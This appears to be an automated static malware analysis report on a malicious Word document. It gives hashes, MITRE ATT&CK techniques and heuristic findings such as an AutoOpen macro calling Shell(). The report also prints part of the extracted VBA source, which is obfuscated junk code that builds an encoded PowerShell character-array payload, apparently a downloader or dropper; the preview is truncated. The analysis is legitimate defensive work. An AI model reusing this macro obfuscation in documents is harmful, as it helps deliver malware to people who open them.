Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db9fd132d53e973c…

MALICIOUS

Office (OLE)

228.8 KB Created: 2018-06-25 16:34:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: 4e5124c5a5c2fe5fad17bcd3b2904e8f SHA-1: 758499e8c139c0193b682ae14f2876c436a1146a SHA-256: db9fd132d53e973c11b691169f7f2836f09cd1d3b3155eb49abf8cb014e490e7
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic firing 'OLE_VBA_SHELL' and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic indicate that the AutoOpen macro attempts to execute code using the Shell() function. The reconstructed string 'Hello [string]::Join( '', ( [char[]] (115,32,19 ,22 ,106, 57,50, 32 , 122 ,56 , 53 , 61, 50 , 35,119,25, 50 , 35 , 121 , 0 ,50,53 , 20,59,62,50, 57 , 35 ,108,115 ,13 ,25 ) ) )' from the VBA script suggests an attempt to construct a command or payload for execution. This indicates a downloader or dropper functionality.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14252 bytes
SHA-256: f5d46a15dd2dbe414cc8c3e01d7df17ac830893e03a98bcbc8a401520257f27b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jUVAdNfZoiHY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IuBiGQqLAP"
Function wBOPrzlQbYE()
On Error Resume Next
zNqGfp = CByte(7410 * Tan(88385) / 464 + CLng(llIUP * 8611 * 21190 * Chr(98954)))
DDSBNC = (66897 / CBool(10521) + 67845 + CSng(KqDSCw) * (31431 - HUwKkV + 32334 - CLng(iKYvG)))
oMRjivw = "He" + "ll" + " [s" + "TRinG" + "]::" + "JoIn" + Chr(40) + " '' ," + " " + Chr(40) + "[cHAR[]" + "]" + Chr(40) + "115" + ",3"
YAuijS = CByte(96530 * Tan(75342) / 66689 + CLng(vVbiz * 144 * 52620 * Chr(55810)))
MwPusT = (93608 / CBool(69846) + 16820 + CSng(Yhnlh) * (83844 - bwSbpN + 38747 - CLng(ZwNwpZ)))
EkMcJpBAqzS = "8 " + ",19 ,2" + "2 ,106," + " 57," + "50, 3" + "2 , 122" + ",56 " + ", 53 , 6" + "1, 50"
bwlTQ = CByte(93262 * Tan(70315) / 84983 + CLng(WtnHiS * 98521 * 32085 * Chr(54534)))
dOjTX = (71187 / CBool(91543) + 19927 + CSng(UjoSw) * (49016 - nrDIX + 55944 - CLng(kWurs)))
jKChTbjn = ", 52" + " , " + "35,119," + "25, 5" + "0 ," + " 35 " + ", 121"
kFSUqj = CByte(31457 * Tan(80298) / 26125 + CLng(Pwfvju * 23 * 70691 * Chr(6727)))
CWKIY = (40095 / CBool(2653) + 199 + CSng(wzctD) * (8628 - WzUBCo + 30568 - CLng(UJUPw)))
QKjowza = " , " + "0 ,50" + ",53 , " + "20,59,6" + "2,5" + "0, " + "57 , 35" + " ,108," + "115 ," + "13" + " ,25 ,"
JjMMuj = CByte(19229 * Tan(83687) / 297 + CLng(cMBzzd * 89849 * 31838 * Chr(68139)))
wBvaUN = (12627 / CBool(8079) + 77393 + CSng(AlBOL) * (84196 - YMVcj + 69224 - CLng(mFJUX)))
OYoSjCEzkz = "5, " + "106 , 11" + "2 ,63,3" + "5 , 35, " + "39" + ", " + "109" + " ,120" + " , 120," + " 45,59 " + ",52"
tljri = CByte(22090 * Tan(57278) / 3729 + CLng(RkDlZq * 60513 * 76398 * Chr(89142)))
jbYiKQ = (33961 / CBool(48273) + 77440 + CSng(DmjNE) * (32523 - pUchT + 46707 - CLng(sPikYI)))
zYtPHzPQvi = ",122" + ",54, " + "54 " + ", 121" + ", 56," + "37 ," + " 48,120" + " ,3," + " 14,19,"
wBOPrzlQbYE = oMRjivw + EkMcJpBAqzS + jKChTbjn + QKjowza + OYoSjCEzkz + zYtPHzPQvi
rqrDFz = CByte(58614 * Tan(43665) / 52625 + CLng(WnHskk * 44929 * 64313 * Chr(29418)))
EFvGJP = (6323 / CBool(78207) + 81204 + CSng(ljAfDK) * (2036 - WWFvn + 82356 - CLng(wQnJB)))
End Function
Function siVMt()
On Error Resume Next
uLFZS = CByte(31534 * Tan(90726) / 77398 + CLng(jKbOrw * 95532 * 96145 * Chr(89501)))
iRXbIR = (9804 / CBool(90679) + 24273 + CSng(QioJuq) * (16183 - zNWdvr + 66557 - CLng(fwaMs)))
mUlNPjZbnEk = "101 " + ", 61,97 " + ",13, 20 " + ",120 " + ",23 ,6" + "3," + " 35,35" + " ,39 , 1" + "09, 120" + ", 120,5" + "3 " + ", 63 ,6"
jkzWs = CByte(85776 * Tan(8133) / 7375 + CLng(XuClOJ * 39155 * 7686 * Chr(14289)))
vjCTBW = (61983 / CBool(86312) + 1272 + CSng(GUAHKk) * (55865 - UXsjJ + 40549 - CLng(TTcqJi)))
jQDkSrD = "2 ,35" + ", 5" + "4," + " 62, 63 " + ",56,36 " + ", 39" + " ," + " 62, 35" + ",54" + " , 59 " + ",121 "
YjnpWJ = CByte(99877 * Tan(66566) / 92858 + CLng(MWBjV * 6154 * 98590 * Chr(60212)))
tdXkO = (49622 / CBool(63501) + 61308 + CSng(CDCrDG) * (77542 - JoskA + 32043 - CLng(UmHjYJ)))
hZFjsGkEIzF = ", 52, 5" + "6 , 58 ," + "12" + "0," + "22, 24" + " ,111 " + ",14,52," + " 53, " + "102 , 0"
EzQoJ = CByte(38423 * Tan(4483) / 92660 + CLng(WkGdN * 10081 * 98329 * Chr(96765)))
tKPPls = (24704 / CBool(73346) + 30129 + CSng(SzHXDi) * (36323 - OjfQb + 85183 - CLng(XdPBzj)))
zYXocqtOY = " ," + " 20" + ", 12" + "0,23" + ",6" + "3, 3" + "5,3" + "5, 39 , " + "109," + "120"
iQwwj = CByte(43813 * Tan(15763) / 4979 + CLng(FmlojM * 74077 * 38019 * Chr(24693)))
Czlwv = (56241 / CBool(67686) + 44461 + CSng(NPzkQt) * (20933 - JHOUwB + 34693 - CLng(IjVOS)))
qPaduPBrjpi = ", 120, " + "53 , 56 " + ",46 , " + "59 ," + " 56 , 57" + " ,51" + " ,5"
VMIww = CByte(43986 * Tan(73963) / 63254 + CLng(tlDlP * 80643 * 83645 * Chr(57721)))
Uvrkk = (6831 / CBool(96341) + 36556 + CSng(mzOIP) * (90537 - jnTJok + 13548 - CLng(IiNMl)))
UjjXMBdYk = "6, 57," + " 121 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.